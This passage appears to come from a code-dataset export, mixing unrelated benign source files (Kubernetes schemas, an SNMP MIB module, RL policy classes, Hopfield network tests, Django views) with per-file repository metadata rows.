"properties": {
"spec": {
"required": ["updateStrategy", "template"],
"properties": {"updateStrategy": {"properties": {"rollingUpdate": {"required": ["maxUnavailable"]}}}},
}
}
}
K8S_DAEMONSET_SCHEMA = update_nested_dict(K8S_DEPLOYMENT_SCHEMA, K8S_DAEMONSET_DIFF)
# Job 与 Deployment 的差异项: Pod 运行时设置
# TODO: 确认 job 中 replicas 和 parallelism 怎么配置
K8S_JOB_DIFF = {
"properties": {
"spec": {
"type": "object",
"required": ["template", "completions", "parallelism", "backoffLimit", "activeDeadlineSeconds"],
"properties": {
"parallelism": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"completions": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"backoffLimit": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"activeDeadlineSeconds": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
},
}
}
}
K8S_JOB_SCHEMA = update_nested_dict(K8S_DEPLOYMENT_SCHEMA, K8S_JOB_DIFF)
# statefulset 与 Deployment 的差异项
K8S_STATEFULSET_DIFF = {
"properties": {
"spec": {
"required": ["template", "updateStrategy", "podManagementPolicy", "volumeClaimTemplates"],
"properties": {
"updateStrategy": {
"type": "object",
"required": ["type"],
"properties": {
"type": {"type": "string", "enum": ["OnDelete", "RollingUpdate"]},
"rollingUpdate": {
"type": "object",
"required": ["partition"],
"properties": {
"partition": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
}
},
},
},
},
"podManagementPolicy": {"type": "string", "enum": ["OrderedReady", "Parallel"]},
"serviceName": {"type": "string", "minLength": 1},
"volumeClaimTemplates": {
"type": "array",
"items": {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {
# "name": {"type": "string", "minLength": 1}
},
},
"spec": {
"type": "object",
"required": ["accessModes", "storageClassName", "resources"],
"properties": {
# "storageClassName": {"type": "string", "minLength": 1},
"accessModes": {
"type": "array",
"items": {
"type": "string",
"enum": ["ReadWriteOnce", "ReadOnlyMany", "ReadWriteMany"],
},
},
"resources": {
"type": "object",
"required": ["requests"],
"properties": {
"requests": {
"type": "object",
"required": ["storage"],
"properties": {
"storage": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
}
},
}
},
},
},
},
},
},
},
},
}
}
}
K8S_STATEFULSET_SCHEMA = update_nested_dict(K8S_DEPLOYMENT_SCHEMA, K8S_STATEFULSET_DIFF)
K8S_CONFIGMAP_SCHEMA = {
"type": "object",
"required": ["metadata", "data"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"data": {
"type": "object",
"patternProperties": {KEY_NAME_PATTERN: {"type": "string"}},
"additionalProperties": False,
},
},
}
K8S_SECRET_SCHEMA = {
"type": "object",
"required": ["metadata", "data"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"data": {
"type": "object",
"patternProperties": {KEY_NAME_PATTERN: {"type": "string"}},
"additionalProperties": False,
},
},
}
K8S_SERVICE_SCHEMA = {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {"type": "object", "required": ["name"], "properties": {"name": {"type": "string"}}},
"spec": {
"type": "object",
"required": ["type", "clusterIP", "ports"],
"properties": {
"type": {"type": "string", "enum": ["ClusterIP", "NodePort"]},
"clusterIP": {"type": "string"},
"ports": {
"type": "array",
"items": {
"type": "object",
"required": ["port", "protocol"],
"properties": {
"name": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": PORT_NAME_PATTERN},
]
},
"port": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 65535},
]
},
"protocol": {"type": "string", "enum": ["TCP", "UDP"]},
"targetPort": {
"anyof": [
{"type": "number", "minimum": 1, "maximum": 65535},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "string", "minLength": 1},
]
},
"nodePort": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 30000, "maximum": 32767},
]
},
},
},
},
},
},
},
}
K8S_INGRESS_SCHEMA = {"type": "object", "required": ["metadata", "spec"]}
K8S_HPA_SCHNEA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"id": "k8s_hpa",
"type": "object",
"required": ["apiVersion", "kind", "metadata", "spec"],
"properties": {
"apiVersion": {"type": "string", "enum": ["autoscaling/v2beta2"]},
"kind": {"type": "string", "enum": ["HorizontalPodAutoscaler"]},
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"spec": {
"type": "object",
"required": ["scaleTargetRef", "minReplicas", "maxReplicas", "metrics"],
"properties": {
"scaleTargetRef": {
"type": "object",
"required": ["kind", "name"],
"properties": {
"kind": {"type": "string", "enum": ["Deployment"]},
"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN},
},
},
"minReplicas": {"type": "number", "minimum": 0},
"maxReplicas": {"type": "number", "minimum": 0},
"metrics": {
"type": "array",
"items": {
"type": "object",
"required": ["type", "resource"],
"properties": {
"type": {"type": "string", "enum": ["Resource"]},
"resource": {
"type": "object",
"required": ["name", "target"],
"properties": {
"name": {"type": "string", "enum": ["cpu", "memory"]},
"target": {
"type": "object",
"required": ["type", "averageUtilization"],
"properties": {
"type": {"type": "string", "enum": ["Utilization"]},
"averageUtilization": {"type": "number", "minimum": 0},
},
},
},
},
},
},
},
},
},
},
}
CONFIG_SCHEMA = [
K8S_DEPLOYMENT_SCHEMA,
K8S_DAEMONSET_SCHEMA,
K8S_JOB_SCHEMA,
K8S_STATEFULSET_SCHEMA,
K8S_SERVICE_SCHEMA,
K8S_CONFIGMAP_SCHEMA,
K8S_SECRET_SCHEMA,
K8S_INGRESS_SCHEMA,
K8S_HPA_SCHNEA,
]
CONFIG_SCHEMA_MAP = dict(zip(KRESOURCE_NAMES, CONFIG_SCHEMA))
| 42.763403 | 119 | 0.323458 | 1,911 | 36,691 | 6.094715 | 0.163789 | 0.106465 | 0.092728 | 0.056667 | 0.600412 | 0.563321 | 0.540998 | 0.531639 | 0.493088 | 0.470507 | 0 | 0.010248 | 0.526614 | 36,691 | 857 | 120 | 42.813302 | 0.660314 | 0.033523 | 0 | 0.509975 | 0 | 0.004988 | 0.254078 | 0.014899 | 0 | 0 | 0 | 0.001167 | 0 | 1 | 0 | false | 0 | 0.002494 | 0 | 0.002494 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
949ade892d25e5435775c907b35e281d3da04296 | 611 | py | Python | src/features/videos/speech/extract_speech.py | ClaasM/VideoArticleRetrieval | 1948887d34b53bdb7a2ec473b31401b395c54e63 | [
"MIT"
] | null | null | null | src/features/videos/speech/extract_speech.py | ClaasM/VideoArticleRetrieval | 1948887d34b53bdb7a2ec473b31401b395c54e63 | [
"MIT"
] | null | null | null | src/features/videos/speech/extract_speech.py | ClaasM/VideoArticleRetrieval | 1948887d34b53bdb7a2ec473b31401b395c54e63 | [
"MIT"
] | null | null | null | import os
from pocketsphinx import AudioFile
from pocketsphinx import Pocketsphinx
from src import util
test_video = os.environ['DATA_PATH'] + "/other/sphinx_test_video/beachball.mp4"
test_audio = os.environ['DATA_PATH'] + "/other/sphinx_test_audio/interview.wav"
fps = 100 # default
audio_file = AudioFile(audio_file=test_audio, frate=100)
for phrase in audio_file: # frate (default=100)
print(" ".join([s.word for s in phrase.seg()]))
#print(Pocketsphinx().decode(audio_file=test_audio))
# i'm home i'm a i'm won't home all cool i'm wall long and lulu move up at bay back when when i'm i'm home
| 29.095238 | 106 | 0.746318 | 105 | 611 | 4.209524 | 0.485714 | 0.027149 | 0.099548 | 0.076923 | 0.144796 | 0.144796 | 0.144796 | 0 | 0 | 0 | 0 | 0.019048 | 0.140753 | 611 | 20 | 107 | 30.55 | 0.822857 | 0.299509 | 0 | 0 | 0 | 0 | 0.224586 | 0.179669 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
94a2a12d12ba8f42c8db354ac4d1caf68ea26d8b | 2,705 | py | Python | rpsp/policy/policies.py | ahefnycmu/rpsp | ff3aa3e89a91bb4afb7bad932d2c04691a727a63 | [
"Apache-2.0"
] | 4 | 2019-11-03T12:04:47.000Z | 2022-01-21T08:55:54.000Z | rpsp/policy/policies.py | ahefnycmu/rpsp | ff3aa3e89a91bb4afb7bad932d2c04691a727a63 | [
"Apache-2.0"
] | null | null | null | rpsp/policy/policies.py | ahefnycmu/rpsp | ff3aa3e89a91bb4afb7bad932d2c04691a727a63 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 28 10:47:38 2016
@author: ahefny
Policies are BLIND to the representation of states, which could be (1) observation,
(2) original latent state or (3) predictive state.
Policies takes the "state" dimension x_dim, the number of actions/dim of action as input.
"""
import numpy as np
import scipy.stats
class BasePolicy(object):
def reset(self):
pass
def sample_action(self, state):
'''
Samples an action and returns a tuple consisting of:
chosen action, action probability,
dictionary of diagnostic information (values must be numbers or vectors)
'''
raise NotImplementedError
def _load(self, params):
raise NotImplementedError
def _save(self):
raise NotImplementedError
class RandomDiscretePolicy(BasePolicy):
def __init__(self, num_actions, rng=None):
self.num_actions = num_actions
self.rng = rng
def sample_action(self, state):
action = self.rng.randint(0, self.num_actions)
return action, 1. / self.num_actions, {}
class RandomGaussianPolicy(BasePolicy):
def __init__(self, num_actions, rng=None):
self.num_actions = num_actions
self.rng = rng
def sample_action(self, state):
action = self.rng.randn(self.num_actions)
return action, np.prod(scipy.stats.norm.pdf(action)), {}
class UniformContinuousPolicy(BasePolicy):
def __init__(self, low, high, rng=None):
self._low = low
self._high = high
self._prob = 1.0 / np.prod(self._high - self._low)
self.rng = rng
def sample_action(self, state):
dim = len(self._high)
action = self.rng.rand(dim)
action = action * (self._high - self._low) + self._low
return action, self._prob, {}
class LinearPolicy(BasePolicy):
def __init__(self, K, sigma, rng=None):
self._K = K
self._sigma = sigma
self.rng = rng
def reset(self):
pass
def sample_action(self, state):
mean = np.dot(self._K, state)
noise = self.rng.randn(len(mean))
sigma = self._sigma
action = mean + noise * sigma
return action, np.prod(scipy.stats.norm.pdf(noise)), {}
class SineWavePolicy(BasePolicy):
def __init__(self, amps, periods, phases):
self._amps = amps
self._scales = 2 * np.pi / periods
self._phases = phases * np.pi / 180.0
self._t = 0
def reset(self):
self._t = 0
def sample_action(self, state):
a = self._amps * np.sin(self._t * self._scales + self._phases)
self._t += 1
return a, 1.0, {}
| 26.009615 | 96 | 0.621442 | 350 | 2,705 | 4.625714 | 0.317143 | 0.067943 | 0.060531 | 0.070414 | 0.308833 | 0.248301 | 0.248301 | 0.248301 | 0.184064 | 0.134651 | 0 | 0.015252 | 0.272828 | 2,705 | 103 | 97 | 26.262136 | 0.807829 | 0.179298 | 0 | 0.393443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.262295 | false | 0.032787 | 0.032787 | 0 | 0.47541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94a2bd43953d6e6e4cffc78fc4b4796273a7d3e4 | 8,002 | py | Python | pysnmp-with-texts/CTRON-CHASSIS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/CTRON-CHASSIS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/CTRON-CHASSIS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module CTRON-CHASSIS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CTRON-CHASSIS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:44:24 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
ctronChassis, = mibBuilder.importSymbols("CTRON-MIB-NAMES", "ctronChassis")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, TimeTicks, Integer32, Counter32, Counter64, NotificationType, ObjectIdentity, iso, MibIdentifier, ModuleIdentity, Unsigned32, Bits, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "TimeTicks", "Integer32", "Counter32", "Counter64", "NotificationType", "ObjectIdentity", "iso", "MibIdentifier", "ModuleIdentity", "Unsigned32", "Bits", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ctChas = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1))
ctEnviron = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2))
ctFanModule = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3))
ctChasFNB = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("absent", 1), ("present", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasFNB.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFNB.setDescription('Denotes the presence or absence of the FNB.')
ctChasAlarmEna = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("disable", 1), ("enable", 2), ("notSupported", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ctChasAlarmEna.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasAlarmEna.setDescription('Allow an audible alarm to be either enabled or dis- abled. Setting this object to disable(1) will prevent an audible alarm from being heard and will also stop the sound from a current audible alarm. Setting this object to enable(2) will allow an audible alarm to be heard and will also enable the sound from a current audible alarm, if it has previously been disabled. This object will read with the current setting.')
chassisAlarmState = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("chassisNoFaultCondition", 1), ("chassisFaultCondition", 2), ("notSupported", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chassisAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: chassisAlarmState.setDescription('Denotes the current condition of the power supply fault detection circuit. This object will read with the value of chassisNoFaultCondition(1) when the chassis is currently operating with no power faults detected. This object will read with the value of chassisFaultCondition(2) when the chassis is currently in a power fault condition.')
ctChasPowerTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1), )
if mibBuilder.loadTexts: ctChasPowerTable.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerTable.setDescription('A list of power supply entries.')
ctChasPowerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1), ).setIndexNames((0, "CTRON-CHASSIS-MIB", "ctChasPowerSupplyNum"))
if mibBuilder.loadTexts: ctChasPowerEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerEntry.setDescription('An entry in the powerTable providing objects for a power supply.')
ctChasPowerSupplyNum = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyNum.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyNum.setDescription('Denotes the power supply.')
ctChasPowerSupplyState = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("infoNotAvailable", 1), ("notInstalled", 2), ("installedAndOperating", 3), ("installedAndNotOperating", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyState.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyState.setDescription("Denotes the power supply's state.")
ctChasPowerSupplyType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ac-dc", 1), ("dc-dc", 2), ("notSupported", 3), ("highOutput", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyType.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyType.setDescription('Denotes the power supply type.')
ctChasPowerSupplyRedundancy = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("redundant", 1), ("notRedundant", 2), ("notSupported", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasPowerSupplyRedundancy.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasPowerSupplyRedundancy.setDescription('Denotes whether or not the power supply is redundant.')
ctChasFanModuleTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1), )
if mibBuilder.loadTexts: ctChasFanModuleTable.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleTable.setDescription('A list of fan module entries.')
ctChasFanModuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1, 1), ).setIndexNames((0, "CTRON-CHASSIS-MIB", "ctChasFanModuleNum"))
if mibBuilder.loadTexts: ctChasFanModuleEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleEntry.setDescription('An entry in the fan module Table providing objects for a fan module.')
ctChasFanModuleNum = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasFanModuleNum.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleNum.setDescription('Denotes the Fan module that may have failed.')
ctChasFanModuleState = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 3, 1, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("infoNotAvailable", 1), ("notInstalled", 2), ("installedAndOperating", 3), ("installedAndNotOperating", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ctChasFanModuleState.setStatus('mandatory')
if mibBuilder.loadTexts: ctChasFanModuleState.setDescription('Denotes the fan modules state.')
mibBuilder.exportSymbols("CTRON-CHASSIS-MIB", ctEnviron=ctEnviron, ctChasPowerSupplyNum=ctChasPowerSupplyNum, ctChasFanModuleState=ctChasFanModuleState, ctChasPowerEntry=ctChasPowerEntry, ctChasPowerSupplyState=ctChasPowerSupplyState, chassisAlarmState=chassisAlarmState, ctChasPowerSupplyType=ctChasPowerSupplyType, ctChas=ctChas, ctChasFanModuleEntry=ctChasFanModuleEntry, ctChasFanModuleTable=ctChasFanModuleTable, ctChasFNB=ctChasFNB, ctChasPowerTable=ctChasPowerTable, ctChasPowerSupplyRedundancy=ctChasPowerSupplyRedundancy, ctChasAlarmEna=ctChasAlarmEna, ctChasFanModuleNum=ctChasFanModuleNum, ctFanModule=ctFanModule)
| 137.965517 | 625 | 0.775806 | 937 | 8,002 | 6.6254 | 0.221985 | 0.050258 | 0.087951 | 0.010309 | 0.495006 | 0.341334 | 0.323131 | 0.292848 | 0.26482 | 0.248389 | 0 | 0.048978 | 0.089103 | 8,002 | 57 | 626 | 140.385965 | 0.802716 | 0.04099 | 0 | 0 | 0 | 0.04 | 0.293803 | 0.029746 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.14 | 0 | 0.14 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94a69109ecb77993367aee324f52626e30882d42 | 307 | py | Python | devtools/write.py | ddrone/language | 1cd8b21b4edc9877dd82efb1092f6f37aab98563 | [
"Apache-2.0"
] | 2 | 2020-08-13T19:12:40.000Z | 2020-09-02T18:39:09.000Z | devtools/write.py | ddrone/language | 1cd8b21b4edc9877dd82efb1092f6f37aab98563 | [
"Apache-2.0"
] | null | null | null | devtools/write.py | ddrone/language | 1cd8b21b4edc9877dd82efb1092f6f37aab98563 | [
"Apache-2.0"
] | null | null | null | import os
import sys
from datetime import datetime
from subprocess import run
name = datetime.utcnow().strftime("%Y%m%d-%H%M%S.md")
try:
# -t stands for "topic"
topic_index = sys.argv.index('-t')
path = os.path.join(sys.argv[topic_index + 1], name)
except:
path = name
run(['code', path])
| 20.466667 | 56 | 0.664495 | 50 | 307 | 4.04 | 0.56 | 0.09901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003953 | 0.175896 | 307 | 14 | 57 | 21.928571 | 0.794466 | 0.068404 | 0 | 0 | 0 | 0 | 0.077465 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
94a725b80964b0d1c363be556587576cc1338bfd | 875 | py | Python | tests/hopfieldnettests/net/network_creation.py | pmatigakis/hopfieldnet | c3e850d41e94383d8f6d2bf079ac706268254ba9 | [
"MIT"
] | 28 | 2015-01-25T21:46:06.000Z | 2022-03-08T20:43:46.000Z | tests/hopfieldnettests/net/network_creation.py | pmatigakis/hopfieldnet | c3e850d41e94383d8f6d2bf079ac706268254ba9 | [
"MIT"
] | null | null | null | tests/hopfieldnettests/net/network_creation.py | pmatigakis/hopfieldnet | c3e850d41e94383d8f6d2bf079ac706268254ba9 | [
"MIT"
] | 13 | 2015-01-25T21:46:10.000Z | 2020-10-23T00:56:07.000Z | import unittest
import numpy as np
from hopfieldnet.net import HopfieldNetwork, InvalidWeightsException
class HopfieldNetworkCreationTests(unittest.TestCase):
def setUp(self):
self.net = HopfieldNetwork(10)
def test_change_network_weights(self):
new_weights = np.ones((10, 10))
self.net.set_weights(new_weights)
self.assertTrue(np.array_equal(self.net.get_weights(), new_weights), "The network weights have not been updated")
def test_fail_to_change_weights_when_shape_not_same_as_input_vector(self):
new_weights = np.ones((5, 5))
self.assertRaises(InvalidWeightsException, self.net.set_weights, new_weights)
def test_network_creation(self):
self.assertEqual(self.net.get_weights().shape, (10, 10), "The networks weight array has wrong shape")
if __name__ == "__main__":
unittest.main()
| 29.166667 | 121 | 0.734857 | 114 | 875 | 5.342105 | 0.447368 | 0.057471 | 0.083744 | 0.052545 | 0.154351 | 0.08867 | 0 | 0 | 0 | 0 | 0 | 0.016506 | 0.169143 | 875 | 29 | 122 | 30.172414 | 0.821183 | 0 | 0 | 0 | 0 | 0 | 0.102857 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0.235294 | false | 0 | 0.176471 | 0 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94a7f32aeb3e4b7407a1b59b692d58dd7cc09416 | 1,737 | py | Python | river_admin/views/function_view.py | pantyukhov/river-admin | 7ed37418a26a4a813fe853c36f33086f80e0309c | [
"BSD-3-Clause"
] | 75 | 2019-11-25T08:28:12.000Z | 2022-03-05T12:35:11.000Z | river_admin/views/function_view.py | pantyukhov/river-admin | 7ed37418a26a4a813fe853c36f33086f80e0309c | [
"BSD-3-Clause"
] | 21 | 2019-11-28T17:17:26.000Z | 2022-02-26T20:42:30.000Z | river_admin/views/function_view.py | pantyukhov/river-admin | 7ed37418a26a4a813fe853c36f33086f80e0309c | [
"BSD-3-Clause"
] | 19 | 2020-02-13T02:00:41.000Z | 2022-03-02T04:47:05.000Z | from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_200_OK
from river.models import Function
from river_admin.views import get, post, put, delete
from river_admin.views.serializers import UpdateFunctionDto, CreateFunctionDto, FunctionDto
@get(r'^function/get/(?P<pk>\w+)/$')
def get_it(request, pk):
function = get_object_or_404(Function.objects.all(), pk=pk)
return Response(FunctionDto(function).data, status=HTTP_200_OK)
@get(r'^function/list/$')
def list_it(request):
return Response(FunctionDto(Function.objects.all(), many=True).data, status=HTTP_200_OK)
@post(r'^function/create/')
def create_it(request):
create_function_request = CreateFunctionDto(data=request.data)
if create_function_request.is_valid():
function = create_function_request.save()
return Response({"id": function.id}, status=HTTP_200_OK)
else:
return Response(create_function_request.errors, status=HTTP_400_BAD_REQUEST)
@put(r'^function/update/(?P<pk>\w+)/$')
def update_it(request, pk):
function = get_object_or_404(Function.objects.all(), pk=pk)
update_function_request = UpdateFunctionDto(data=request.data, instance=function)
if update_function_request.is_valid():
update_function_request.save()
return Response({"message": "Function is updated"}, status=HTTP_200_OK)
else:
return Response(update_function_request.errors, status=HTTP_400_BAD_REQUEST)
@delete(r'^function/delete/(?P<pk>\w+)/$')
def delete_it(request, pk):
function = get_object_or_404(Function.objects.all(), pk=pk)
function.delete()
return Response(status=HTTP_200_OK)
| 36.1875 | 92 | 0.754174 | 242 | 1,737 | 5.161157 | 0.223141 | 0.096077 | 0.043235 | 0.060048 | 0.338671 | 0.255404 | 0.255404 | 0.202562 | 0.132106 | 0.132106 | 0 | 0.025624 | 0.123777 | 1,737 | 47 | 93 | 36.957447 | 0.795007 | 0 | 0 | 0.142857 | 0 | 0 | 0.085204 | 0.050086 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.171429 | 0.028571 | 0.514286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
94b185ec7b26237c15a8147e0cf8e33a0273856f | 2,080 | py | Python | roadmap/migrations/0001_initial.py | bitmazk/django-roadmap | 72cdc20bcd129ffb00395d5b1215fedbf59218b2 | [
"MIT"
] | 2 | 2019-11-29T01:06:08.000Z | 2020-09-15T23:02:18.000Z | roadmap/migrations/0001_initial.py | bitmazk/django-roadmap | 72cdc20bcd129ffb00395d5b1215fedbf59218b2 | [
"MIT"
